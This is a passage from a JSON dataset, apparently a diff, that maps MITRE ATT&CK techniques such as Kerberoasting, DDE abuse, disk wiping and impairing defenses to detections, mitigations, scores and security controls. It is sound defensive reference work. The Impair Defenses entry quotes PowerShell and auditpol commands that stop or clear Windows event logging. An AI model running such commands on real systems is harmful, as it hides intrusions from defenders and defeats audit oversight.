2014)(Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)", + "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1558.004", + "name": "Steal or Forge Kerberos Tickets: AS-REP Roasting", + "url": "https://attack.mitre.org/techniques/T1558/004", + "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)", + "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 0.77466586304, + "adjusted_score": 0.77466586304, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "4.1,4.7,5.2,5.3,5.4,5.5,6.1,6.2,6.8,18.3,18.5,3.10" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-18", + "AC-19", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CM-2", + "CM-5", + "CM-6", + "IA-2", + "IA-5", + "SC-4", + "SI-12", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1559", + "name": "Inter-Process Communication", + "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)", + "url": "https://attack.mitre.org/techniques/T1559", + "tactics": [ + "Execution" + ], + "detection": "Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.", + "platforms": [ + "Windows", + "macOS" + ], + "data_sources": [ + "Module: Module Load", + "Process: Process Creation", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1559.001", + "name": "Inter-Process Communication: Component Object Model", + "url": "https://attack.mitre.org/techniques/T1559/001", + "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)", + "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ", + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1559.002", + "name": "Inter-Process Communication: Dynamic Data Exchange", + "url": "https://attack.mitre.org/techniques/T1559/002", + "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)", + "detection": "Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).\n\nOLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)", + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "cumulative_score": 0.7089784200561905, + "adjusted_score": 0.7089784200561905, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.5,2.6,4.1,4.8,13.7,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CM-10", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "RA-5", + "SC-18", + "SC-3", + "SC-7", + "SI-2", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1560", + "name": "Archive Collected Data", + "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.", + "url": "https://attack.mitre.org/techniques/T1560", + "tactics": [ + "Collection" + ], + "detection": "Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nA process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Creation", + "Process: Process Creation", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1560.001", + "name": "Archive Collected Data: Archive via Utility", + "url": "https://attack.mitre.org/techniques/T1560/001", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.\n\nSome 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.", + "detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1560.002", + "name": "Archive Collected Data: Archive via Library", + "url": "https://attack.mitre.org/techniques/T1560/002", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.\n\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.", + "detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "mitigations": [] + }, + { + "tid": "T1560.003", + "name": "Archive Collected Data: Archive via Custom Method", + "url": "https://attack.mitre.org/techniques/T1560/003", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)", + "detection": "Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.", + "mitigations": [] + } + ], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "cumulative_score": 0.9555651616076191, + "adjusted_score": 0.9555651616076191, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.1,2.2,2.3,2.4,18.3,18.5" + ], + "nist_controls": [ + "CA-8", + "RA-5", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1561", + "name": "Disk Wipe", + "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)", + "url": "https://attack.mitre.org/techniques/T1561", + "tactics": [ + "Impact" + ], + "detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Drive: Drive Access", + "Drive: Drive Modification", + "Driver: Driver Load", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1561.001", + "name": "Disk Wipe: Disk Content Wipe", + "url": "https://attack.mitre.org/techniques/T1561/001", + "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)", + "detection": "Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.", + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ] + }, + { + "tid": "T1561.002", + "name": "Disk Wipe: Disk Structure Wipe", + "url": "https://attack.mitre.org/techniques/T1561/002", + "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", + "detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.", + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1053", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "cumulative_score": 0.3202746861561905, + "adjusted_score": 0.3202746861561905, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "11.1,11.2,11.3,11.4,11.5" + ], + "nist_controls": [ + "AC-3", + "AC-6", + "CM-2", + "CP-10", + "CP-2", + "CP-7", + "CP-9", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1562", + "name": "Impair Defenses", + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.", + "url": "https://attack.mitre.org/techniques/T1562", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.\n\nMonitor environment variables and APIs that can be leveraged to disable security measures.", + "platforms": [ + "Containers", + "IaaS", + "Linux", + "Network", + "Office 365", + "Windows", + "macOS" + ], + "data_sources": [ + "Cloud Service: Cloud Service Disable", + "Cloud Service: Cloud Service Modification", + "Command: Command Execution", + "Firewall: Firewall Disable", + "Firewall: Firewall Rule Modification", + "Process: Process Creation", + "Process: Process Termination", + "Script: Script Execution", + "Sensor Health: Host Status", + "Service: Service Metadata", + "Windows Registry: Windows Registry Key Deletion", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1562.001", + "name": "Impair Defenses: Disable or Modify Tools", + "url": "https://attack.mitre.org/techniques/T1562/001", + "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information.\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)", + "detection": "Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.\n\nLack of expected log events may be suspicious.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1562.002", + "name": "Impair Defenses: Disable Windows Event Logging", + "url": "https://attack.mitre.org/techniques/T1562/002", + "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.", + "detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) \n\nIn Event Viewer, Event ID 1102 under the “Security” Windows Log and Event ID 104 under the “System” Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\n\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": 